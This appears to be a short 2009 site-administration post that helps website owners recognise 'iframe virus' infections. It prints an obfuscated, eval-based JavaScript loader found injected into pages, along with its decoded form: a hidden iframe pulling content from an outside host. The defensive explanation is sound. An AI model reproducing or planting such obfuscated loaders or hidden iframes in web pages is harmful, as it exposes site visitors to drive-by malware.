Sometimes, iframe variants come in the form of javascript. You may NOT see iframe tags in the source because it will be encoded.
Instead, you may find this code in your html or PHP or ASP code:
<script language=JavaScript>function ttbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,48,16,4,32,56,33,28,35,40,0,0,0,0,0,0,42,18,39,0,1,46,55,62,3,29,34,25,59,38,23,36,43,11,12,24,30,19,37,57,53,31,13,0,0,0,0,8,0,52,21,58,60,15,17,14,61,54,49,45,22,6,10,26,47,5,50,41,2,9,7,27,51,20,44);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(148^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ttbnb25('8FpG1p05cTg5XHT5BBcz2ppGjeLP1p0h6BYdcHEE8wT04vepxJo0rwThWvekcNYGjBo9jHc9konkBwGhsoQ04HgWEELE8TgWjvedcipGrp0E4pL@xGwiXHg0coGG6PeddMIh4xpEMNpG1pYGdiPpVgnPOrop0gw9jHc9kocz0gPkagT01Hg0soosMAQ0jF0ddHT@ztnkBHTL5vY@itY0BUgGXFEPcppGjwP@9Ew0rwThWvp@xiQ')</script>
It's a more clever form of iframe variant virus. If you decode the above script code, it becomes:
window.status='Done';document.write('<iframe name=5e4792 src="http://7speed.info/t/?'+Math.round(Math.random()*17808)+'5e4792'+'" width=212 height=84 style="display:none"></iframe>')
As you can see the above javascript simply generates iframe code and is more sophisticated form of iframe virus.
I find suspicious javascript code in my files. Is it iframe virus?
Submitted by admin on Fri, 10/02/2009 - 03:55
Bookmark/Search this post with:
